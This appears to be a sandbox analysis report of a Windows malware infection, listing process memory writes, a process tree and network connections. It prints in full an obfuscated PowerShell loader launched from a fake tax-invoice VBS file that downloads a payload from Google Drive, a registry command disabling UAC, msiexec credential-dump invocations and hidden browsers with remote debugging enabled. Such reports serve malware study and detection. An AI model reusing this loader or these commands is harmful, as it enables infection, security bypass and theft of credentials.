PID 2232 wrote to memory of 2736 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2232 wrote to memory of 2736 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2232 wrote to memory of 2736 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2232 wrote to memory of 2736 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2232 wrote to memory of 2736 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2232 wrote to memory of 2736 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2232 wrote to memory of 2736 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2232 wrote to memory of 2736 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2232 wrote to memory of 2736 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2232 wrote to memory of 2736 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2232 wrote to memory of 2736 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2232 wrote to memory of 2736 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2232 wrote to memory of 2736 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2232 wrote to memory of 2736 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2232 wrote to memory of 2736 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2232 wrote to memory of 2236 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2232 wrote to memory of 2236 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2232 wrote to memory of 4836 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2232 wrote to memory of 4836 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2232 wrote to memory of 4836 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2232 wrote to memory of 4836 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\전자세금계산서·pdf.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Undiscriminatingness Vodun Hervards Folkefrontsregeringen Carmakers #><#Polyhedrons Versionsnavnenes Baalets Quadrennially Catarines Recondite #>$Disleaf100='Mrtel';function Moderates7($Trdestens){If ($host.DebuggerEnabled) {$Flood++;$effectualnesses=$Trdestens.'Length' - $Flood} for ( $Foelelsen=4;$Foelelsen -lt $effectualnesses;$Foelelsen+=5){$Brillanters151=$Foelelsen;$Sippingly+=$Trdestens[$Foelelsen]}$Sippingly}function forsrgelseskommunernes($Primrfilers){ .($Modkandidaten) ($Primrfilers)}$Lossen=Moderates7 'Forgn KnoeGe,vtBist.Jeh w Vs.EEndybUnsecAlkol,eroIAspieSandn Re.Tco n ';$Splanchnopleure=Moderates7 'Kl.tM iaoK.gezTugti ClelFormlPrewaBac /Redi ';$flintres=Moderates7 ' sogTOrgalSupesColp1Unus2 ryn ';$Kliniskes='Mail[Rac,NGluce SquTOmsi.StresParneBasiR L mv kerIHe,sC Ko etwelPUnesOCe tiR giNPolyT amuMa,baASashng teAGenfG AirEAngrr ent]B ug: Ryk:,eenSDogseMar,cBet.U olsROm yI rigTPyrrYFl.nPclavr Couo FortMedio beecCharoSp oL ,ev=stud$OpspfBioglTummi ormN Sn.TParlrUlykeOf dSMoze ';$Splanchnopleure+=Moderates7 ' aje5Cas .fors0Skar T sk( imiW,okuiOrddnDo.adsteroAy twF,apsNu z V,nNchroTErob rot 1Cens0Type.Prod0Hove;Te r SensW nci Keln B.a6 Rec4Fakt;Dile MichxUdfo6Gyld4Klor;Exhu UnmrRentvtext: es1 Ill3Eret1aper.None0Reve) Ant Cu.GProgeP rocpalikRn,eo Hai/ .ap2,ede0 Ful1E,in0 Bu 0cata1Ud,l0,ovn1Li.p RevoFP.ntiSalgrTurbeSl gfakt o A txf ls/ Pec1N vl3De.e1Len .Nic 0Dipl ';$Umodenhedens246=Moderates7 'Ss.euLuneSMultEA roRComi-DkssAPadagSymmEPl tNSolltSted ';$Tallit=Moderates7 'R.buhPondtGud tThurpImpusAfse:Chid/anas/kr,pdDobbrTruci Cr,v Plue eng.Uds,gTayioTradoel kgImmalS.gne ush.Leibc SkroBorrmAn i/SquauBru,c.ors?PerreI loxNonspPreso Omsr ventQuod=PluvdSulpo BlewDiscnarenlNeuro Disa MoldImpr&Ph,sibungd kor=Karr1Siph1kejs6EsopG tepeBortVKlipSBeelxO tjaforu7StarC tifmMelo0 .esvFlorf M,lwMu.r2 Up zOve t EnapT,fnBEquimsaggqTa aL Bie8DialUVariy Me,A,orsNPancdC muA ap_Topao eal ';$Udfrselsforbuddets=Moderates7 'Quar>,yan ';$Modkandidaten=Moderates7 ' MidiGua EFes xDo e ';$Par='Problemfrit';$Skridfastes='\Banebryderes.Non';forsrgelseskommunernes (Moderates7 '.den$F kagLogalPagiOTem bF,miA arLP,is: Faxe C,nsRej rBeg o CurgS,egsEndo= ymn$Mas eKnleNCracV Cli:Le.saSkaaP Medp irsdN.npA Inft ho aBism+T mm$TranSWaivKMlkeREkspIRecrdUdprFOverARi oSUdbyT soEGropsFil ');forsrgelseskommunernes (Moderates7 'Andr$SeveGSkurlMks.O nsBFordAA baLCe.s:TidsCs enrPersoSammTKli aPirqp rimhEnthI Gauo RednBrnd=Efte$FisstTrinAVeinLE taLProtiHereT Per.DobbSS,eaP atal C,eIHypoTFras(Til.$U inuUnmuD ameF uborUvejSUroceHalel MooSDsleFPar,OH.ikRtopfbBogpu heDRaadD FriELapaT orss Dat)S,ot ');forsrgelseskommunernes (Moderates7 $Kliniskes);$Tallit=$Crotaphion[0];$Mytologiers=(Moderates7 'Preg$FodngIndklBlodoOpd,B alaDesslWarm:di essvmmITeleLKarrjRe mAHankSPort=CellNSkrieFadeW K,i-,lado D bB ArbJAsice CatCd,rmTHngt .ncrSVareyReacs E stUskaenutiMM lo. Art$ TriLFatto zygsGlauSpatcE ropnOv r ');forsrgelseskommunernes ($Mytologiers);forsrgelseskommunernes (Moderates7 'halv$UnfoSForriWooll refjKajaaA unsLigh.Cou.H ngeeVandaOu.tdT lbe afrr,allsdest[,epa$,ntaUI,gem TjroHidsdLarmeCycanAfbrhUvaneRoerd Do eFa.tnA,tisUsmm2 Fal4Resr6 Fe,] Eng=Bear$SkadS KetpAutolR,baa RepnTro csarahEpocn,agso wepOrdelskileAno upla r ndeFdre ');$Rumpadder=Moderates7 'Radi$SessSbi ti S,nlU etjfro a OopsUdfr.Unw DR ugoAutow azan koblscraoSpidaMaa dJarvFPoesiS bslTaveePros(Soci$,ourTForea Fril R nlThioi SubtRefu,To p$EutyV alvaBasnmSupesUrok)Goat ';$Vams=$Esrogs;forsrgelseskommunernes (Moderates7 'Flas$Photg,ontlAlimoDanuBHonnaZ ielLa d:SkrapInp R StrIOystoVo,eR BrniIgant.eriemazaT Ales udsRStryk Pyck ase draf NaiLVindG.ncoeUnde=C ma(DesatLi rE RedsEksptDege-F empCirkamangtVernhLekt Busf$skriVSladaPeccM.ortsMeso)Tils ');while (!$Prioritetsrkkeflge) {forsrgelseskommunernes (Moderates7 'Reri$TaargBanelMi toindpb F mareselTerm:YusdMMoraaFinapKlerpC.pteBillrEcho=Post$BrnetEmmer.lagu Drie rei ') ;forsrgelseskommunernes $Rumpadder;forsrgelseskommunernes (Moderates7 'BromsRespTVelsaTierRSta tStre- MovSInteLArcheKuldeundfp.qui Gran4Disa ');forsrgelseskommunernes (Moderates7 'Numm$UnreG AsmLOutsoM ltb lumA.ellL.ale: A sPLiftrOrnai irco ThaR,mbriFerrTSha eMeddtNonlsobskRF euKAn rKHandEKol,f IntL P.pg.ynfe,rab=Pist(Hus,tsys.e mansStjkTEksp- alpNataAOptoTModeHTord Anf$SupeV.ndka AntMOvers Jv.)Pann ') ;forsrgelseskommunernes (Moderates7 'sw n$SexgGAposLLideOEl ebunpeANonsLSita:MispR DrueSalvPTil EInderPhotKSe i= Lud$GromgG rnlElatO TriBTheoaMillL Exu:P ela Hetu allGUkbuUjoggSLizetAssuSAcetNCha D iera Ma,gBnkh+ko p+Tere%Pree$ lsdC FhorIsomoPerit BreaForeP GreHKoloiMicro lgtNGasa.Ret C ropoPounuMalmnAlumtNons ') ;$Tallit=$Crotaphion[$Reperk]}$poncho=321965;$Yawn=30428;forsrgelseskommunernes (Moderates7 'Elfo$Stefg UnbLCiliO C eBverdA DatLmela:PlejNAffueEnemPiridHhrecrIrr e DefCinditRoduAForeSSneaIEvapa Ye Chac=Proe BakuGS,iceTvist dr-meascBassORa iN.leuT Ture Tann JerTnrin yd r$S.ndVStruA yrmS.lss us ');forsrgelseskommunernes (Moderates7 'Udeb$ForbgCheel.enaoBirrbFor a.bdulHvil:DokuEMulmx KamsFolkeChokrRevitReunsHjfo Con =Bekl Ha.i[ InjSApriySirpsS lhtIndde Form Akk.BippC OveoFljdnarguvCu ue.nuer ToptMisp] Sot:Serv:BaadFKenirShunoIn emG,veB,eroaPasssAn.meCann6 len4InanSA oxtArcurGi tiOutlnAfragU de( Att$OogeNfugueVanlpUns,hRonirAn.ueAp rcRaditElekaTusksSpitiForvabegr)Bane ');forsrgelseskommunernes (Moderates7 'Vaga$ onGProclParaOUre BSilvaVestlPapi: S.rsDe omO,snAInamaZ naFK,nseInefj,ugsLMerssDoor Camo= Mon Str[Fa,ssRtehyEkspsDelttrecieFladMForb.ArbeTBezoE,vigX VdeT Chi.BeefECinnN roccBeskoFormd,rumiIn oNL anGBu l]Pare:bygn:MongA P fsPyraCOpbliCin.IBema.Ome gHinge GenT UdvsHumrtInfarVil ITilhNUsliGF,tt(Macr$D,ueE Lo xPhocs leENonerar.et.eleSMell)Afs ');forsrgelseskommunernes (Moderates7 'Rusl$syl GDerfl aphOQuasbB.spABundlF it:Te.bot ktP KomPBeleIGr,yGJapaN ImpoLemaRsid a V.dT,oveESpio=Me e$FabrsAbelmHyd AR dhAStilf Ov eF,reJSyndL finS T v.PaspSSkyhusig BRecosTlpetBl dRc uniSangn NonG Cha(Lill$trosPR.maOStyln.ericO,sth,nfrO al.,Geog$Skn.YTvrfaRuggwNewsnToha) onc ');forsrgelseskommunernes $Oppignorate;"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Undiscriminatingness Vodun Hervards Folkefrontsregeringen Carmakers #><#Polyhedrons Versionsnavnenes Baalets Quadrennially Catarines Recondite #>$Disleaf100='Mrtel';function Moderates7($Trdestens){If ($host.DebuggerEnabled) {$Flood++;$effectualnesses=$Trdestens.'Length' - $Flood} for ( $Foelelsen=4;$Foelelsen -lt $effectualnesses;$Foelelsen+=5){$Brillanters151=$Foelelsen;$Sippingly+=$Trdestens[$Foelelsen]}$Sippingly}function forsrgelseskommunernes($Primrfilers){ .($Modkandidaten) ($Primrfilers)}$Lossen=Moderates7 'Forgn KnoeGe,vtBist.Jeh w Vs.EEndybUnsecAlkol,eroIAspieSandn Re.Tco n ';$Splanchnopleure=Moderates7 'Kl.tM iaoK.gezTugti ClelFormlPrewaBac /Redi ';$flintres=Moderates7 ' sogTOrgalSupesColp1Unus2 ryn ';$Kliniskes='Mail[Rac,NGluce SquTOmsi.StresParneBasiR L mv kerIHe,sC Ko etwelPUnesOCe tiR giNPolyT amuMa,baASashng teAGenfG AirEAngrr ent]B ug: Ryk:,eenSDogseMar,cBet.U olsROm yI rigTPyrrYFl.nPclavr Couo FortMedio beecCharoSp oL ,ev=stud$OpspfBioglTummi ormN Sn.TParlrUlykeOf dSMoze ';$Splanchnopleure+=Moderates7 ' aje5Cas .fors0Skar T sk( imiW,okuiOrddnDo.adsteroAy twF,apsNu z V,nNchroTErob rot 1Cens0Type.Prod0Hove;Te r SensW nci Keln B.a6 Rec4Fakt;Dile MichxUdfo6Gyld4Klor;Exhu UnmrRentvtext: es1 Ill3Eret1aper.None0Reve) Ant Cu.GProgeP rocpalikRn,eo Hai/ .ap2,ede0 Ful1E,in0 Bu 0cata1Ud,l0,ovn1Li.p RevoFP.ntiSalgrTurbeSl gfakt o A txf ls/ Pec1N vl3De.e1Len .Nic 0Dipl ';$Umodenhedens246=Moderates7 'Ss.euLuneSMultEA roRComi-DkssAPadagSymmEPl tNSolltSted ';$Tallit=Moderates7 'R.buhPondtGud tThurpImpusAfse:Chid/anas/kr,pdDobbrTruci Cr,v Plue eng.Uds,gTayioTradoel kgImmalS.gne ush.Leibc SkroBorrmAn i/SquauBru,c.ors?PerreI loxNonspPreso Omsr ventQuod=PluvdSulpo BlewDiscnarenlNeuro Disa MoldImpr&Ph,sibungd kor=Karr1Siph1kejs6EsopG tepeBortVKlipSBeelxO tjaforu7StarC tifmMelo0 .esvFlorf M,lwMu.r2 Up zOve t EnapT,fnBEquimsaggqTa aL Bie8DialUVariy Me,A,orsNPancdC muA ap_Topao eal ';$Udfrselsforbuddets=Moderates7 'Quar>,yan ';$Modkandidaten=Moderates7 ' MidiGua EFes xDo e ';$Par='Problemfrit';$Skridfastes='\Banebryderes.Non';forsrgelseskommunernes (Moderates7 '.den$F kagLogalPagiOTem bF,miA arLP,is: Faxe C,nsRej rBeg o CurgS,egsEndo= ymn$Mas eKnleNCracV Cli:Le.saSkaaP Medp irsdN.npA Inft ho aBism+T mm$TranSWaivKMlkeREkspIRecrdUdprFOverARi oSUdbyT soEGropsFil ');forsrgelseskommunernes (Moderates7 'Andr$SeveGSkurlMks.O nsBFordAA baLCe.s:TidsCs enrPersoSammTKli aPirqp rimhEnthI Gauo RednBrnd=Efte$FisstTrinAVeinLE taLProtiHereT Per.DobbSS,eaP atal C,eIHypoTFras(Til.$U inuUnmuD ameF uborUvejSUroceHalel MooSDsleFPar,OH.ikRtopfbBogpu heDRaadD FriELapaT orss Dat)S,ot ');forsrgelseskommunernes (Moderates7 $Kliniskes);$Tallit=$Crotaphion[0];$Mytologiers=(Moderates7 'Preg$FodngIndklBlodoOpd,B alaDesslWarm:di essvmmITeleLKarrjRe mAHankSPort=CellNSkrieFadeW K,i-,lado D bB ArbJAsice CatCd,rmTHngt .ncrSVareyReacs E stUskaenutiMM lo. Art$ TriLFatto zygsGlauSpatcE ropnOv r ');forsrgelseskommunernes ($Mytologiers);forsrgelseskommunernes (Moderates7 'halv$UnfoSForriWooll refjKajaaA unsLigh.Cou.H ngeeVandaOu.tdT lbe afrr,allsdest[,epa$,ntaUI,gem TjroHidsdLarmeCycanAfbrhUvaneRoerd Do eFa.tnA,tisUsmm2 Fal4Resr6 Fe,] Eng=Bear$SkadS KetpAutolR,baa RepnTro csarahEpocn,agso wepOrdelskileAno upla r ndeFdre ');$Rumpadder=Moderates7 'Radi$SessSbi ti S,nlU etjfro a OopsUdfr.Unw DR ugoAutow azan koblscraoSpidaMaa dJarvFPoesiS bslTaveePros(Soci$,ourTForea Fril R nlThioi SubtRefu,To p$EutyV alvaBasnmSupesUrok)Goat ';$Vams=$Esrogs;forsrgelseskommunernes (Moderates7 'Flas$Photg,ontlAlimoDanuBHonnaZ ielLa d:SkrapInp R StrIOystoVo,eR BrniIgant.eriemazaT Ales udsRStryk Pyck ase draf NaiLVindG.ncoeUnde=C ma(DesatLi rE RedsEksptDege-F empCirkamangtVernhLekt Busf$skriVSladaPeccM.ortsMeso)Tils ');while (!$Prioritetsrkkeflge) {forsrgelseskommunernes (Moderates7 'Reri$TaargBanelMi toindpb F mareselTerm:YusdMMoraaFinapKlerpC.pteBillrEcho=Post$BrnetEmmer.lagu Drie rei ') ;forsrgelseskommunernes $Rumpadder;forsrgelseskommunernes (Moderates7 'BromsRespTVelsaTierRSta tStre- MovSInteLArcheKuldeundfp.qui Gran4Disa ');forsrgelseskommunernes (Moderates7 'Numm$UnreG AsmLOutsoM ltb lumA.ellL.ale: A sPLiftrOrnai irco ThaR,mbriFerrTSha eMeddtNonlsobskRF euKAn rKHandEKol,f IntL P.pg.ynfe,rab=Pist(Hus,tsys.e mansStjkTEksp- alpNataAOptoTModeHTord Anf$SupeV.ndka AntMOvers Jv.)Pann ') ;forsrgelseskommunernes (Moderates7 'sw n$SexgGAposLLideOEl ebunpeANonsLSita:MispR DrueSalvPTil EInderPhotKSe i= Lud$GromgG rnlElatO TriBTheoaMillL Exu:P ela Hetu allGUkbuUjoggSLizetAssuSAcetNCha D iera Ma,gBnkh+ko p+Tere%Pree$ lsdC FhorIsomoPerit BreaForeP GreHKoloiMicro lgtNGasa.Ret C ropoPounuMalmnAlumtNons ') ;$Tallit=$Crotaphion[$Reperk]}$poncho=321965;$Yawn=30428;forsrgelseskommunernes (Moderates7 'Elfo$Stefg UnbLCiliO C eBverdA DatLmela:PlejNAffueEnemPiridHhrecrIrr e DefCinditRoduAForeSSneaIEvapa Ye Chac=Proe BakuGS,iceTvist dr-meascBassORa iN.leuT Ture Tann JerTnrin yd r$S.ndVStruA yrmS.lss us ');forsrgelseskommunernes (Moderates7 'Udeb$ForbgCheel.enaoBirrbFor a.bdulHvil:DokuEMulmx KamsFolkeChokrRevitReunsHjfo Con =Bekl Ha.i[ InjSApriySirpsS lhtIndde Form Akk.BippC OveoFljdnarguvCu ue.nuer ToptMisp] Sot:Serv:BaadFKenirShunoIn emG,veB,eroaPasssAn.meCann6 len4InanSA oxtArcurGi tiOutlnAfragU de( Att$OogeNfugueVanlpUns,hRonirAn.ueAp rcRaditElekaTusksSpitiForvabegr)Bane ');forsrgelseskommunernes (Moderates7 'Vaga$ onGProclParaOUre BSilvaVestlPapi: S.rsDe omO,snAInamaZ naFK,nseInefj,ugsLMerssDoor Camo= Mon Str[Fa,ssRtehyEkspsDelttrecieFladMForb.ArbeTBezoE,vigX VdeT Chi.BeefECinnN roccBeskoFormd,rumiIn oNL anGBu l]Pare:bygn:MongA P fsPyraCOpbliCin.IBema.Ome gHinge GenT UdvsHumrtInfarVil ITilhNUsliGF,tt(Macr$D,ueE Lo xPhocs leENonerar.et.eleSMell)Afs ');forsrgelseskommunernes (Moderates7 'Rusl$syl GDerfl aphOQuasbB.spABundlF it:Te.bot ktP KomPBeleIGr,yGJapaN ImpoLemaRsid a V.dT,oveESpio=Me e$FabrsAbelmHyd AR dhAStilf Ov eF,reJSyndL finS T v.PaspSSkyhusig BRecosTlpetBl dRc uniSangn NonG Cha(Lill$trosPR.maOStyln.ericO,sth,nfrO al.,Geog$Skn.YTvrfaRuggwNewsnToha) onc ');forsrgelseskommunernes $Oppignorate;"

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\SysWOW64\msiexec.exe"

C:\Windows\SysWOW64\cmd.exe

/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Program Files\Google\Chrome\Application\Chrome.exe

--user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffbfb3dcc40,0x7ffbfb3dcc4c,0x7ffbfb3dcc58

C:\Windows\SysWOW64\msiexec.exe

C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\xqvjk"

C:\Windows\SysWOW64\msiexec.exe

C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\asabllaq"

C:\Windows\SysWOW64\msiexec.exe

C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\kmoudelsdmfr"

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1908,i,13778609097984486118,11989820454279729354,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1904 /prefetch:2

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2136,i,13778609097984486118,11989820454279729354,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2192 /prefetch:3

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2220,i,13778609097984486118,11989820454279729354,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2492 /prefetch:8

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3144,i,13778609097984486118,11989820454279729354,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3160 /prefetch:1

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3164,i,13778609097984486118,11989820454279729354,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3228 /prefetch:1

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4620,i,13778609097984486118,11989820454279729354,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4336 /prefetch:1

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4716,i,13778609097984486118,11989820454279729354,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3140 /prefetch:8

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4304,i,13778609097984486118,11989820454279729354,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4008 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

--user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffbfad146f8,0x7ffbfad14708,0x7ffbfad14718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2160,11643972076810085607,2250406591901065164,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2204 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2160,11643972076810085607,2250406591901065164,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2264 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2160,11643972076810085607,2250406591901065164,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2844 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2160,11643972076810085607,2250406591901065164,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3220 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2160,11643972076810085607,2250406591901065164,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3304 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2160,11643972076810085607,2250406591901065164,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5492 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2160,11643972076810085607,2250406591901065164,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5612 /prefetch:1

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 drive.google.com udp
GB 142.250.187.206:443 drive.google.com tcp
